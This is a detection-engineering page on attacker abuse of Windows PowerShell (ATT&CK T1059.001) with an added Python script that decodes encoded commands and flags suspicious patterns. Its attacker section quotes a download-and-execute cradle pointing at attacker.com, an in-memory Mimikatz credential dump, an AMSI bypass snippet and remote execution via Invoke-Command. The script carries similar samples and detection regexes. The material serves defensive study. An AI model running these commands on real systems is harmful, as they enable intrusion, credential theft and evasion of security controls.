| Technique | PowerShell (T1059.001) |
|---|---|
| Tactic | Execution |
| Platforms | Windows |
Overview
PowerShell (T1059.001) refers to adversary abuse of Windows PowerShell — Microsoft’s built-in scripting language and interactive shell — to execute commands, run scripts, download payloads, and perform post-exploitation activity. Because PowerShell is deeply integrated into Windows administration and automation, it is available on virtually every modern Windows endpoint and server by default. Attackers exploit this ubiquity to blend into legitimate administrative traffic, making PowerShell one of the most heavily abused living-off-the-land (LotL) techniques observed in real-world intrusions.
The capability range available to an attacker through PowerShell is enormous: it can download and execute code directly in memory without writing to disk (fileless execution), interact with the Windows API, enumerate Active Directory, pivot to remote systems via Invoke-Command or WinRM, exfiltrate data, establish C2 channels over HTTP/S or DNS, and bypass application whitelisting controls. Entire offensive frameworks — Empire, PowerSploit, PoshC2, Cobalt Strike’s PowerShell stagers — are built on top of PowerShell. Critically, PowerShell can also be invoked without launching powershell.exe at all, by directly calling the System.Management.Automation .NET assembly from within a custom host process, making purely process-name-based detections insufficient.
Every security team must build layered detection coverage for this technique. It appears consistently across ransomware, nation-state, and financially motivated intrusion campaigns. The combination of native availability, broad capability, and multiple evasion avenues — encoding, obfuscation, alternate hosts, constrained language mode bypass — means that a single detection rule is never enough. Teams need telemetry from Script Block Logging, module logging, process creation events, and network visibility working together.
Attacker Perspective
Adversaries use PowerShell at nearly every phase of an intrusion. The following scenarios represent patterns seen repeatedly in real-world campaigns and red team engagements:
- Fileless stager execution via encoded commands: Phishing or an exploit delivers a small dropper that runs `powershell.exe -NoP -NonI -W Hidden -Enc <base64_blob>`. The decoded payload downloads a second-stage implant directly into memory using `IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/stage2')`, leaving no executable on disk. Cobalt Strike, Metasploit, and Empire all generate payloads in this pattern.
- Living-off-the-land credential harvesting: After gaining an initial foothold, attackers run Invoke-Mimikatz from PowerSploit entirely in memory: `IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/.../Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds`. No mimikatz binary is ever written to disk, but LSASS memory is read and credentials are extracted.
- Invoke-Obfuscation and AMSI bypass: Sophisticated attackers obfuscate PowerShell payloads using tools like Invoke-Obfuscation or ISE-Steroids to evade signature-based detection, then prepend AMSI bypass snippets such as `[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)` before executing the actual malicious code. The Red Canary 2023 Threat Detection Report consistently lists AMSI bypass patterns among the top observed techniques.
- WMI and PowerShell lateral movement: Attackers use `Invoke-WMIMethod` or `Invoke-Command` to execute encoded PowerShell remotely on other hosts without interactively logging in: `Invoke-Command -ComputerName TARGET -ScriptBlock { IEX ... }`. This pattern is characteristic of APT29, FIN7, and numerous ransomware operators during their lateral movement phase.
- PowerShell-based C2 and DNS exfiltration: Tools like Dnscat2 (via `Start-Dnscat2`) and PowerShell Empire establish C2 channels over DNS or HTTP from within a PowerShell runspace. This allows continued attacker access even when direct TCP connections are blocked, using the DNS resolver as a covert channel.
PowerShell is attractive to attackers because it is signed by Microsoft, present on every Windows system, can operate entirely in memory, integrates natively with .NET and the Windows API, supports rich obfuscation, and generates log noise in environments that haven’t tuned their detections — making malicious activity easy to hide among legitimate administrative use. Its dual-use nature means defenders must be surgical rather than simply blocking the binary.
Detection Strategy
Community Sigma Rules — The following rules from the SigmaHQ community repository implement detection for this technique. Use Uncoder.io or pySigma to convert them to your SIEM’s query language.
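As an added example (not one of the SigmaHQ rules and not code from the original page), the following Python triages process-creation command lines the way the Sigma rules above would: it decodes the UTF-16LE base64 behind -EncodedCommand and checks both the raw and decoded text for the hidden-window, download-cradle and AMSI-bypass patterns described in the attacker scenarios. The sample command lines, URL and script path are constructed placeholders, and the list of -EncodedCommand abbreviations is an assumption.

```python
import base64
import re
from typing import Optional

# Constructed sample CommandLine fields (Sysmon Event ID 1 / Security 4688 style);
# the URL and script path are invented placeholders, not real telemetry.
ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
    .encode("utf-16-le")).decode()
SAMPLE_COMMAND_LINES = [
    f"powershell.exe -NoP -NonI -W Hidden -Enc {ENCODED_PAYLOAD}",
    "powershell.exe -Command \"[Ref].Assembly.GetType('System.Management.Automation"
    ".AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)\"",
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\Backup-Db.ps1",
]

# -EncodedCommand plus its common abbreviations, then the base64 blob. Assumption:
# this covers the forms seen in practice, not every prefix PowerShell accepts.
ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

# Indicators checked against the raw command line and the decoded payload.
INDICATORS = {
    "encoded_command": ENC_FLAG,
    "hidden_window": re.compile(r"-W(?:indowStyle)?\s+Hidden", re.I),
    "download_cradle": re.compile(r"(?:Invoke-Expression|\bIEX\b).*DownloadString", re.I),
    "amsi_bypass": re.compile(r"AmsiUtils|amsiInitFailed", re.I),
}

def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the UTF-16LE text behind -EncodedCommand, or None if absent or malformed."""
    m = ENC_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # undecodable blob: the encoded_command indicator still fires

def analyze_command_line(command_line: str) -> dict:
    """Decode any encoded payload, then report every indicator that matches."""
    decoded = decode_encoded_command(command_line)
    texts = [command_line] + ([decoded] if decoded else [])
    hits = sorted({name for name, rx in INDICATORS.items()
                   for text in texts if rx.search(text)})
    return {"command_line": command_line, "decoded": decoded, "indicators": hits}

def triage(command_lines) -> list:
    """Keep only the command lines that trip at least one indicator."""
    return [r for r in map(analyze_command_line, command_lines) if r["indicators"]]
```

Run over SAMPLE_COMMAND_LINES, `triage` returns the encoded download cradle and the AMSI bypass but drops the signed backup script, which is the false-positive filtering a process-name-only rule cannot do.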
When the Alert Fires: Investigation Steps
Response Playbook